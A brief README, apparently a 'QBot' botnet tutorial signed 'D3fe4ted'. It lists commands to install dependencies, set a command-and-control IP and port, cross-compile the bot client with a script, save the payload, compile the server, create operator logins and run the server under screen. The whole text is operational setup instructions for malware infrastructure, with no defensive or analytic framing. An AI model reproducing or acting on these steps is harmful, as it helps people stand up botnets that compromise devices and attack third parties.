 _____ _____     _      _____     _   
|     | __  |___| |_   |_   _|_ _| |_ 
|  |  | __ -| . |  _|    | | | | |  _|
|__  _|_____|___|_|      |_| |___|_|  
   |__|                               by D3fe4ted

1. yum install python python-paramiko screen gcc nano perl perl-CPAN
2. go to client and change (ip) and (port)
3. python2 cc7.py client.c (ip)
4. Save your payload
5. gcc server.c -o server -pthread
7. nano login.txt (username password role mm/dd/yy)
8. screen ./server (port) 1000 (port)